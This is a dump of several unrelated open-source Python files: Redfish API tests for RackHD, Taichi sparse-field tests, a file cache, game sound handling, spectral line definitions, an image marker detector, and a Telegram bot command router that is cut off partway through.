if self.__is_close: raise ValueError("the connection is closed,you should not send data")
self.__update_time = time.time()
wrap_msg = self.__encoder.build_frame(msg, fin, rsv, opcode)
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
def ws_readable(self, message, fin, rsv, opcode, frame_finish):
"""重写这个方法
:param message:
:param fin:
:param rsv:
:param opcode:
:param is_finish:
:return:
"""
pass
def ws_close(self, code=None):
"""关闭ws连接
:return:
"""
if not code:
code = ""
else:
code = str(code)
wrap_msg = self.__encoder.build_close(code.encode("iso-8859-1"))
self.__is_close = True
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
self.__update_time = time.time()
self.delete_this_no_sent_data()
def ws_release(self):
"""重写这个方法
:return:
"""
pass | bsd-2-clause | -8,273,594,278,908,964,000 | 25.149254 | 116 | 0.545953 | false |
johren/RackHD | test/tests/redfish10/test_redfish10_api_systems.py | 1 | 17067 | '''
Copyright 2016, EMC, Inc.
Author(s):
George Paulos
'''
import fit_path # NOQA: unused import
import os
import sys
import subprocess
import fit_common
import flogging
log = flogging.get_loggers()
# Local methods
NODECATALOG = fit_common.node_select()
def _delete_active_tasks(node):
for dummy in range(1,10):
if fit_common.rackhdapi('/api/current/nodes/' + node + '/workflows/active', action='delete')['status'] in [204, 404]:
return True
else:
fit_common.time.sleep(10)
return False
# Select test group here using @attr
from nose.plugins.attrib import attr
@attr(all=True, regression=True, smoke=True)
class redfish10_api_systems(fit_common.unittest.TestCase):
def test_redfish_v1_systems(self):
api_data = fit_common.rackhdapi('/redfish/v1/Systems')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
# check all fields
for item in api_data['json']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertNotEqual(item, "", 'Empty JSON Field')
# check required fields
for item in ['Name', '@odata.id', '@odata.type']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertIn(item, api_data['json'], item + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format( api_data['json'][item]))
self.assertGreater(len(api_data['json'][item]), 0, item + ' field empty')
# test all nodeid links
for item in api_data['json']['Members']:
link_data = fit_common.rackhdapi(item['@odata.id'])
# all these are legit return codes under different conditions
self.assertEqual(link_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(link_data['status']))
def test_redfish_v1_systems_id(self):
api_data = fit_common.rackhdapi('/redfish/v1/Systems')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for nodeid in api_data['json']['Members']:
api_data = fit_common.rackhdapi(nodeid['@odata.id'])
if api_data['status'] == 200: # if valid cache record, run chassis ID query
# check required fields
# check Name field first because that will be used for other checks
self.assertIn('Name', api_data['json'], 'Name field not present')
self.assertGreater(len(api_data['json']['Name']), 0, 'Name field empty')
system_name = api_data['json']['Name']
if fit_common.VERBOSITY >= 2:
print ("System Name: {0}".format(system_name))
for item in ['SKU', 'BiosVersion', 'PowerState', 'Processors', '@odata.id', 'Status', 'UUID',
'Manufacturer', 'IndicatorLED']:
self.assertIn(item, api_data['json'], item + ' field not present')
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
print ("\t {0}".format(api_data['json'][item]))
# comment the following out until ODR-526 is resolved; Unknown systems return
# a Name value of 'Computer System' instead of 'Unknown'
#if system_name != 'Unknown':
#    self.assertGreater(len(api_data['json'][item]), 0, item + ' field empty')
def test_redfish_v1_systems_id_actions_computersystemreset_get(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Actions/ComputerSystem.Reset')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
reset_commands = [
"On",
"ForceOff",
"GracefulShutdown",
"GracefulRestart",
"ForceRestart",
"Nmi",
"ForceOn",
"PushPowerButton"
]
# iterate through all posted reset types for each node
for reset_type in api_data['json']['[email protected]']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(reset_type))
self.assertIn(reset_type, reset_commands, "Incorrect reset_type")
def test_redfish_v1_systems_id_actions_computersystemreset_post(self):
# iterate through node IDs
for nodeid in NODECATALOG:
# delete previously active tasks
_delete_active_tasks(nodeid)
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Actions/ComputerSystem.Reset')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
on_payload = {"reset_type": "On"}
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid +
'/Actions/ComputerSystem.Reset', action='post',
payload=on_payload)
self.assertEqual(api_data['status'], 202, 'Incorrect HTTP return code, expected 202, got:' + str(api_data['status']))
# check for running task
task_data = fit_common.rackhdapi(api_data['json']['@odata.id'])
self.assertEqual(task_data['status'], 200, "No task ID for reset ")
self.assertIn(task_data['json']['TaskState'], ["Running", "Pending", "Completed", "Exception"], "Bad task state for node:" + nodeid)
def test_redfish_v1_systems_id_actions_rackhdbootimage_get(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Actions/RackHD.BootImage')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_logservices(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid)
if api_data['status'] == 200:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/LogServices')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_processors_id(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Processors')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for links in api_data['json']['Members']:
api_data = fit_common.rackhdapi(links['@odata.id'])
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for item in api_data['json']:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
print ("\t {0}".format(api_data['json'][item]))
self.assertNotEqual(item, "", 'Empty JSON Field')
def test_redfish_v1_systems_id_ethernetinterfaces(self):
# Will produce a list of available Ethernet interfaces
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/EthernetInterfaces')
self.assertIn(api_data['status'], [200], 'Expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_bios(self):
# Only works for Dell servers with microservices
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Bios')
if fit_common.is_dell_node(nodeid):
self.assertIn(api_data['status'], [200], 'Expected 200, got:' + str(api_data['status']))
else:
self.assertIn(api_data['status'], [404], 'Expected 404, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_bios_settings(self):
# Only works for Dell servers with microservices
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/Bios/Settings')
if fit_common.is_dell_node(nodeid):
self.assertIn(api_data['status'], [200], 'Expected 200, got:' + str(api_data['status']))
else:
self.assertIn(api_data['status'], [404], 'Expected 404, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_simplestorage(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SimpleStorage')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_simplestorage_id(self):
href_list = []
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SimpleStorage')
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for nodeid in api_data['json']['Members']:
href_list.append(nodeid['@odata.id']) # collect links
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
# iterate through links
for url in href_list:
api_data = fit_common.rackhdapi(url)
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
def test_redfish_v1_systems_id_logservices_sel(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL")
if fit_common.VERBOSITY >= 2:
print ("nodeid: {0}".format(nodeid))
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for item in ['MaxNumberOfRecords', 'OverWritePolicy', 'DateTimeLocalOffset', 'Actions']:
self.assertIn(item, api_data['json'], item + ' field not present')
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
print ("\t {0}".format(api_data['json'][item]))
self.assertGreater(len(str(api_data['json'][item])), 0, item + ' field empty')
def test_redfish_v1_systems_id_logservices_sel_entries(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL/Entries")
if fit_common.VERBOSITY >= 2:
print ("nodeid: {0}".format(nodeid))
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
# check required fields in the nodeid entry
for nodeid in api_data['json']['Members']:
self.assertIn('@odata.id', nodeid, '@odata.id field not present')
self.assertGreater(len(nodeid['@odata.id']), 0, '@odata.id field empty')
if fit_common.VERBOSITY >= 2:
print ("\nEntry {0}".format(nodeid['@odata.id']))
for item in [ 'Id', 'Created', 'EntryCode', 'EntryType', 'SensorType', 'Name', 'Message' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertIn(item, nodeid, item + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format(nodeid[item]))
if len(nodeid[item]) == 0 and item == 'Message':
log.info_5("Message field empty for SEL SensorType:" + nodeid['SensorType'] +
" SensorNumber:" + str(nodeid['SensorNumber']))
else:
self.assertGreater(len(nodeid[item]), 0, item + ' field empty')
for link in [ 'OriginOfCondition' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(link))
self.assertIn('OriginOfCondition', nodeid['Links'], 'OriginOfCondition' + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0} ".format(nodeid['Links']['OriginOfCondition']))
def test_redfish_v1_systems_id_logservices_sel_entries_id(self):
# iterate through node IDs
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL/Entries")
if fit_common.VERBOSITY >= 2:
print ("nodeid: {0}".format(nodeid))
self.assertEqual(api_data['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(api_data['status']))
for member in api_data['json']['Members']:
self.assertIn('@odata.id', member, '@odata.id field not present')
self.assertGreater(len(member['@odata.id']), 0, '@odata.id field empty')
if fit_common.VERBOSITY >= 2:
print ("\nEntry {0}".format(member['@odata.id']))
#get the selid off the list
selid = str(member['Id'])
if fit_common.VERBOSITY >= 3:
print ("SEL Entry: {0}".format(selid))
#retrieve the data for the specific SEL entry and iterate through individual fields
seldata = fit_common.rackhdapi("/redfish/v1/Systems/" + nodeid + "/LogServices/SEL/Entries/" + selid)
self.assertEqual(seldata['status'], 200, 'Incorrect HTTP return code, expected 200, got:' + str(seldata['status']))
for item in [ 'Id', 'Created', 'EntryCode', 'EntryType', 'SensorType', 'Name', 'Message' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(item))
self.assertIn(item, seldata['json'], item + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format(seldata['json'][item]))
if len(seldata['json'][item]) == 0 and item == 'Message':
log.info_5("Message field empty for SEL SensorType:" + seldata['json']['SensorType'] +
" SensorNumber:" + str(seldata['json']['SensorNumber']))
else:
self.assertGreater(len(seldata['json'][item]), 0, item + ' field empty')
for link in [ 'OriginOfCondition' ]:
if fit_common.VERBOSITY >= 2:
print ("Checking: {0}".format(link))
self.assertIn('OriginOfCondition', seldata['json']['Links'], 'OriginOfCondition' + ' field not present')
if fit_common.VERBOSITY >= 3:
print ("\t {0}".format(seldata['json']['Links']['OriginOfCondition']))
def test_redfish_v1_systems_id_secureboot(self):
# Currently relies on Dell/Racadm, so just test for exceptions
for nodeid in NODECATALOG:
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SecureBoot')
self.assertEqual(api_data['status'], 500, 'Incorrect HTTP return code, expected 500, got:' + str(api_data['status']))
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SecureBoot', action='post',
payload={"zzzSecureBootEnable": True})
self.assertEqual(api_data['status'], 400, 'Incorrect HTTP return code, expected 400, got:' + str(api_data['status']))
api_data = fit_common.rackhdapi('/redfish/v1/Systems/' + nodeid + '/SecureBoot', action='post',
payload={"SecureBootEnable": True})
self.assertEqual(api_data['status'], 500, 'Incorrect HTTP return code, expected 500, got:' + str(api_data['status']))
if __name__ == '__main__':
fit_common.unittest.main()
broomyocymru/ditto | ditto/core/cache.py
import glob
import os
import shutil
import uuid
from os.path import expanduser
import requests
from ditto.core import logger
def setup():
global session_uuid
session_uuid = str(uuid.uuid1())
def cleanup():
shutil.rmtree(get_cache_dir(), True)
def get_session_uuid():
return session_uuid
def get_file(file_path):
if file_path.startswith('http'):
fname = file_path.split('/')[-1]
if not os.path.exists(get_cache_dir()):
os.makedirs(get_cache_dir())
local_path = os.path.abspath(get_cache_dir() + '/' + fname)
r = requests.get(file_path, stream=True)
if r.status_code == 200:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
del r
else:
logger.error("Download failed (" + file_path + ")")
file_path = local_path
else:
file_paths = glob.glob(file_path)
if len(file_paths) > 1:
logger.warn("More than 1 file found, taking first")
if len(file_paths) == 0:
logger.error("File not found (" + file_path + ")")
file_path = os.path.abspath(file_paths[0])
return file_path
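# Usage sketch (paths and URL are illustrative):
#
#   local = get_file("http://example.com/pkg.zip")  # downloaded into ~/.ditto_cache
#   local = get_file("./conf/*.yml")                # absolute path of first glob match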
def get_cache_dir():
cache_dir = os.path.abspath(os.path.join(expanduser("~"), ".ditto_cache"))
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
return cache_dir
yuanming-hu/taichi | tests/python/test_bitmasked.py
import taichi as ti
def archs_support_bitmasked(func):
return ti.archs_excluding(ti.opengl, ti.cc)(func)
@archs_support_bitmasked
def test_basic():
x = ti.field(ti.i32)
c = ti.field(ti.i32)
s = ti.field(ti.i32)
bm = ti.root.bitmasked(ti.ij, (3, 6)).bitmasked(ti.i, 5)
bm.place(x)
ti.root.place(c, s)
@ti.kernel
def run():
x[5, 1] = 2
x[9, 4] = 20
x[0, 3] = 20
@ti.kernel
def sum():
for i, j in x:
c[None] += ti.is_active(bm, [i, j])
s[None] += x[i, j]
run()
sum()
assert c[None] == 3
assert s[None] == 42
@archs_support_bitmasked
def test_bitmasked_then_dense():
x = ti.field(ti.f32)
s = ti.field(ti.i32)
n = 128
ti.root.bitmasked(ti.i, n).dense(ti.i, n).place(x)
ti.root.place(s)
@ti.kernel
def func():
for i in x:
s[None] += 1
x[0] = 1
x[127] = 1
x[256] = 1
x[257] = 1
func()
assert s[None] == 256
@archs_support_bitmasked
def test_bitmasked_bitmasked():
x = ti.field(ti.f32)
s = ti.field(ti.i32)
n = 128
ti.root.bitmasked(ti.i, n).bitmasked(ti.i, n).place(x)
ti.root.place(s)
@ti.kernel
def func():
for i in x:
s[None] += 1
x[0] = 1
x[127] = 1
x[256] = 1
x[257] = 1
func()
assert s[None] == 4
@archs_support_bitmasked
def test_huge_bitmasked():
# Mainly for testing Metal listgen's grid-stride loop implementation.
x = ti.field(ti.f32)
s = ti.field(ti.i32)
n = 1024
ti.root.bitmasked(ti.i, n).bitmasked(ti.i, 2 * n).place(x)
ti.root.place(s)
@ti.kernel
def func():
for i in range(n * n * 2):
if i % 32 == 0:
x[i] = 1.0
@ti.kernel
def count():
for i in x:
s[None] += 1
func()
count()
assert s[None] == (n * n * 2) // 32
@archs_support_bitmasked
def test_bitmasked_listgen_bounded():
# Mainly for testing that Metal's listgen is bounded by the actual number of
# elements possible for that SNode. Note that 1) an SNode's size is padded
# to a power of two, and 2) Metal ListManager's data size is not padded, so we
# need to make sure listgen doesn't go beyond ListManager's capacity.
x = ti.field(ti.i32)
c = ti.field(ti.i32)
# A prime that is bit higher than 65536, which is Metal's maximum number of
# threads for listgen.
n = 80173
ti.root.dense(ti.i, n).bitmasked(ti.i, 1).place(x)
ti.root.place(c)
@ti.kernel
def func():
for i in range(n):
x[i] = 1
@ti.kernel
def count():
for i in x:
c[None] += 1
func()
count()
assert c[None] == n
@archs_support_bitmasked
def test_deactivate():
# https://github.com/taichi-dev/taichi/issues/778
a = ti.field(ti.i32)
a_a = ti.root.bitmasked(ti.i, 4)
a_b = a_a.dense(ti.i, 4)
a_b.place(a)
c = ti.field(ti.i32)
ti.root.place(c)
@ti.kernel
def run():
a[0] = 123
@ti.kernel
def is_active():
c[None] = ti.is_active(a_a, [0])
@ti.kernel
def deactivate():
ti.deactivate(a_a, [0])
run()
is_active()
assert c[None] == 1
deactivate()
is_active()
assert c[None] == 0
@archs_support_bitmasked
def test_sparsity_changes():
x = ti.field(ti.i32)
c = ti.field(ti.i32)
s = ti.field(ti.i32)
bm = ti.root.bitmasked(ti.i, 5).bitmasked(ti.i, 3)
bm.place(x)
ti.root.place(c, s)
@ti.kernel
def run():
for i in x:
s[None] += x[i]
c[None] += 1
# Only two elements of |x| are activated
x[1] = 2
x[8] = 20
run()
assert c[None] == 2
assert s[None] == 22
c[None] = 0
s[None] = 0
# Four elements are activated now
x[7] = 15
x[14] = 5
run()
assert c[None] == 4
assert s[None] == 42
@archs_support_bitmasked
def test_bitmasked_offset_child():
x = ti.field(ti.i32)
x2 = ti.field(ti.i32)
y = ti.field(ti.i32)
y2 = ti.field(ti.i32)
y3 = ti.field(ti.i32)
z = ti.field(ti.i32)
s = ti.field(ti.i32, shape=())
n = 16
# Offset children:
# * In |bm|'s cell: |bm2| has a non-zero offset
# * In |bm2|'s cell: |z| has a non-zero offset
# * We iterate over |z| to test the listgen handles offsets correctly
bm = ti.root.bitmasked(ti.i, n)
bm.dense(ti.i, 16).place(x, x2)
bm2 = bm.bitmasked(ti.i, 4)
bm2.dense(ti.i, 4).place(y, y2, y3)
bm2.bitmasked(ti.i, 4).place(z)
@ti.kernel
def func():
for _ in z:
s[None] += 1
z[0] = 1
z[7] = 1
z[42] = 1
z[53] = 1
z[88] = 1
z[101] = 1
z[233] = 1
func()
assert s[None] == 7
jemofthewest/GalaxyMage | src/Sound.py
# Copyright (C) 2005 Colin McMillen <[email protected]>
#
# This file is part of GalaxyMage.
#
# GalaxyMage is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# GalaxyMage is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GalaxyMage; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
# You may import this module only after the pygame mixer module has
# been initialized.
import Resources
import pygame
_quiet = False
_mixerInit = pygame.mixer.get_init() != None
if _mixerInit:
_cursorChannel = pygame.mixer.Channel(0)
_actionChannel = pygame.mixer.Channel(1)
else:
_quiet = True
_cursorChannel = None
_actionChannel = None
def _play(channel, sound):
if not _mixerInit:
return
if not _quiet and sound != None:
channel.play(sound)
def setQuiet(quiet):
global _quiet
if not _mixerInit:
return
_quiet = quiet
if _quiet:
pygame.mixer.pause()
pygame.mixer.music.pause()
else:
pygame.mixer.unpause()
pygame.mixer.music.unpause()
def toggleQuiet():
setQuiet(not _quiet)
def playMusic(musicName):
"""Changes background music."""
if not _mixerInit:
return
if not _quiet:
Resources.music(musicName)
def playTune(tuneName):
"""Plays a short tune. Returns whether it was actually played."""
if _mixerInit and not _quiet:
Resources.music(tuneName, loop=False)
return True
else:
return False
def cursorClick():
s = Resources.sound("cursor-click")
_play(_cursorChannel, s)
def cursorCancel():
s = Resources.sound("cursor-cancel")
_play(_cursorChannel, s)
def cursorMove():
s = Resources.sound("cursor-move")
_play(_cursorChannel, s)
def cursorInvalid():
s = Resources.sound("cursor-invalid")
_play(_cursorChannel, s)
def action(sound):
s = Resources.sound(sound)
_play(_actionChannel, s)
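# Usage sketch (resource names are illustrative keys for Resources):
#
#   setQuiet(False)
#   cursorMove()             # plays "cursor-move" on the cursor channel
#   action("sword-clash")    # plays the named sound on the action channel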
JohanComparat/pySU | galaxy/python/lineListAir.py
"""
Script loading the atomic properties from the pyNEB package.
Mostly line transitions.
Input to the line fitting procedures
"""
import numpy as n
from scipy.interpolate import interp1d
import pyneb as pn
# Conversion from Morton (1991, ApJS, 77, 119); wavelengths in Angstrom.
# SDSS spectra are given in vacuum wavelengths, therefore the reference wavelengths of the lines must also be in vacuum.
AIR = lambda VAC : VAC / (1.0 + 2.735182e-4 + 131.4182 / VAC**2 + 2.76249e8 / VAC**4)
vacs=n.arange(1000,12000,0.01)
airs=AIR(vacs)
VAC = interp1d(airs,vacs)
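# Example (values approximate, for illustration): the vacuum-to-air conversion
# and its interpolated inverse are nearly reciprocal over 1000-12000 A.
#
#   AIR(6564.6)   # -> ~6562.8 Angstrom (air)
#   VAC(6562.8)   # -> ~6564.6 Angstrom (vacuum)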
# Wavelengths from pyNeb Atoms are in A in vacuum like the SDSS spectra. No need to convert.
C3 = pn.Atom('C', 3)
#C3.printIonic()
C3_1908=AIR(1/(C3.getEnergy(C3.getTransition(1908)[0])-C3.getEnergy(C3.getTransition(1908)[1])))
C4 = pn.Atom('C', 4)
#C4.printIonic()
C4_1548=AIR(1/(C4.getEnergy(C4.getTransition(1548)[0])-C4.getEnergy(C4.getTransition(1548)[1])))
O2 = pn.Atom('O', 2)
#O2.printIonic()
O2_3727=AIR(1/(O2.getEnergy(O2.getTransition(3727)[0])-O2.getEnergy(O2.getTransition(3727)[1])))
O2_3729=AIR(1/(O2.getEnergy(O2.getTransition(3729)[0])-O2.getEnergy(O2.getTransition(3729)[1])))
#O2=AIR((O2_3727+O2_3729)/2.)
O2_mean=(O2_3727*3.326568+O2_3729*3.324086)/(3.326568 + 3.324086)
Ne3 = pn.Atom('Ne',3)
#Ne3.printIonic()
Ne3_3869=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3869)[0])-Ne3.getEnergy(Ne3.getTransition(3869)[1])))
Ne3_3968=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3968)[0])-Ne3.getEnergy(Ne3.getTransition(3968)[1])))
O3 = pn.Atom('O', 3)
#O3.printIonic()
O3_4363=AIR(1/(O3.getEnergy(O3.getTransition(4363)[0])-O3.getEnergy(O3.getTransition(4363)[1])))
O3_4960=AIR(1/(O3.getEnergy(O3.getTransition(4960)[0])-O3.getEnergy(O3.getTransition(4960)[1])))
O3_5007=AIR(1/(O3.getEnergy(O3.getTransition(5007)[0])-O3.getEnergy(O3.getTransition(5007)[1])))
O1 = pn.Atom('O', 1)
O1_5578=AIR(1/(O1.getEnergy(O1.getTransition(5578)[0])-O1.getEnergy(O1.getTransition(5578)[1])))
O1_6302=AIR(1/(O1.getEnergy(O1.getTransition(6302)[0])-O1.getEnergy(O1.getTransition(6302)[1])))
O1_6365=AIR(1/(O1.getEnergy(O1.getTransition(6365)[0])-O1.getEnergy(O1.getTransition(6365)[1])))
N2 = pn.Atom('N', 2)
#N2.printIonic()
N2_5756=AIR(1/(N2.getEnergy(N2.getTransition(5756)[0])-N2.getEnergy(N2.getTransition(5756)[1])))
N2_6549=AIR(1/(N2.getEnergy(N2.getTransition(6549)[0])-N2.getEnergy(N2.getTransition(6549)[1])))
N2_6585=AIR(1/(N2.getEnergy(N2.getTransition(6585)[0])-N2.getEnergy(N2.getTransition(6585)[1])))
S2 = pn.Atom('S', 2)
#S2.printIonic()
S2_6718=AIR(1/(S2.getEnergy(S2.getTransition(6718)[0])-S2.getEnergy(S2.getTransition(6718)[1])))
S2_6732=AIR(1/(S2.getEnergy(S2.getTransition(6732)[0])-S2.getEnergy(S2.getTransition(6732)[1])))
Ar3 = pn.Atom('Ar', 3)
#Ar3.printIonic()
Ar3_7137=AIR(1/(Ar3.getEnergy(Ar3.getTransition(7137)[0])-Ar3.getEnergy(Ar3.getTransition(7137)[1])))
# Wavelengths from pyNeb RecAtoms are in A in Air like the SDSS spectra. Conversion needed.
H1=pn.RecAtom('H',1) # Hydrogen Balmer series
H1_3970=H1.getWave(7,2)
H1_4102=H1.getWave(6,2)
H1_4341=H1.getWave(5,2)
H1_4862=H1.getWave(4,2)
H1_6564=H1.getWave(3,2)
H1=pn.RecAtom('H',1) # Hydrogen Lyman series
H1_1216=H1.getWave(2,1)
He1=pn.RecAtom('He',1) # Helium
He2=pn.RecAtom('He',2) # Helium
He2_4686=He2.getWave(4,3)
He2_5411=He2.getWave(7,4)
# Limits for the 4000 A fit
#dl4k=150
#intLim4k=n.array([3950-dl4k, 3950, 4050, 4050+dl4k])
#intLim4k=n.array([3600-dl4k, 3600, 4140, 4140+dl4k])
# limits for th eUV luminosities fits
#intLimUV=n.array([2000,2200,3000,3200,3400,3600,4100,4300,4500,4700])
# system at 2360
# cmin1,cmax1=2080.,2240.
#em1=2326.7
#abs1=2343.7
#em2=2365.3
#aTR=2370.
#abs2=2374.3
#abs3=2382.2
#em3=2396.2
# cmin2,cmax2=2400.,2550.
#a0s2360=n.array([em1,abs1,em2,abs2,abs3,em3])
# system at 2600
#em1=2586.1
#em2=2599.6
#aTR=2606.
#abs1=2612.5
#abs2=2626.3
#cmin1,cmax1=2400.,2550.
#cmin2,cmax2=2650.,2770.
#a0s2600=n.array([em1,em2,abs1,abs2])
# system at 2800
#Mga=2795.
#Mgb=2802.
#aTR=2798.
#cmin1,cmax1=2650.,2770.
#cmin2,cmax2=2807., 2840.
#a0s2800=n.array([Mga,Mgb])
# abs2852=3851.9
# cmin2,cmax2=2870.,3000.
black-knight/magic_lamp | Server/src/board/markers/marker.py
import cv2
from board.board_descriptor import BoardDescriptor
class Marker(object):
def __init__(self, marker_id):
"""
:param marker_id: Marker ID
"""
self.marker_id = marker_id
def preferred_input_image_resolution(self):
"""
Returns the preferred input resolution for this marker detector. Defaults to medium.
:return: Input resolution (of type BoardDescriptor.SnapshotSize)
"""
return BoardDescriptor.SnapshotSize.MEDIUM
def find_markers_in_image(self, image):
"""
Find all markers in image.
:param image: Image
:return: List of markers each in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return []
def find_markers_in_thresholded_image(self, image):
"""
Find all markers in image which has already been thresholded.
:param image: Image
:return: List of markers each in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return []
def find_marker_in_image(self, image):
"""
Find marker in image.
:param image: Image
:return: Marker in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return None
def find_marker_in_thresholded_image(self, image):
"""
Find marker in image which has already been thresholded.
:param image: Thresholded image
:return: Marker in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return None
def contour_to_marker_result(self, image, contour):
"""
Extracts marker result from contour.
:param image: Image
:param contour: Contour
:return: Result in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
image_height, image_width = image.shape[:2]
box = cv2.minAreaRect(contour)
return {"markerId": self.marker_id,
"x": float(box[0][0]) / float(image_width),
"y": float(box[0][1]) / float(image_height),
"width": float(box[1][0]) / float(image_width),
"height": float(box[1][1]) / float(image_height),
"angle": box[2],
"contour": contour}
def contours_to_marker_result(self, image, contours):
"""
Extracts marker results from contours.
:param image: Image
:param contours: Contours
:return: List of markers each in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return [self.contour_to_marker_result(image, contour) for contour in contours]
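# Result sketch for contour_to_marker_result (values illustrative): coordinates
# and sizes are normalized to the image dimensions.
#
#   {"markerId": 7, "x": 0.52, "y": 0.48, "width": 0.10, "height": 0.21,
#    "angle": -42.0, "contour": contour}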
JulyJ/MindBot | mindbot/router.py
"""
Module designed to route messages based on strategy pattern.
This module includes class mapper tuple to correlate received from telegram
user command with target command class to run. Additionally, this module
generates help message based on command list.
"""
from typing import Any, Dict
from .command.help.commands import GreetingsCommand, HelpCommand
from .command.nasa.apod import APODCommand
from .command.nasa.asteroid import AsteroidCommand
from .command.nasa.curiosity import CuriosityCommand
from .command.search.google import GoogleCommand
from .command.search.wiki import WikiCommand, RandomCommand
from .command.search.urban import UrbanDictionaryCommand
from .command.search.dictionary import DictionaryCommand
from .command.weather.weather import WeatherCommand
from .command.weather.forecast import ForecastCommand
from .command.exchange.exchange import ExchangeCommand
from .command.remember.rememberall import RememberAll
from .command.remember.searchtag import SearchTagCommand
from .command.comics.xkcd import XkcdCommand
from .command.tools.qrgenerator import QrCommand
from .command.tools.ocr import OcrCommand
from .command.news.hackernews import LatestNewsCommand, TopNewsCommand, BestNewsCommand
from .command.news.canadanews import CanadaStatsCommand
class CommandRouter:
command_class_mapper = (
('/help', HelpCommand),
('/asteroid', AsteroidCommand),
('/start', GreetingsCommand),
('/canadastat', CanadaStatsCommand),
('/oxford', DictionaryCommand),
('/exchange', ExchangeCommand),
('/forecast', ForecastCommand),
('/google', GoogleCommand),
('/search', SearchTagCommand),
('/urban', UrbanDictionaryCommand),
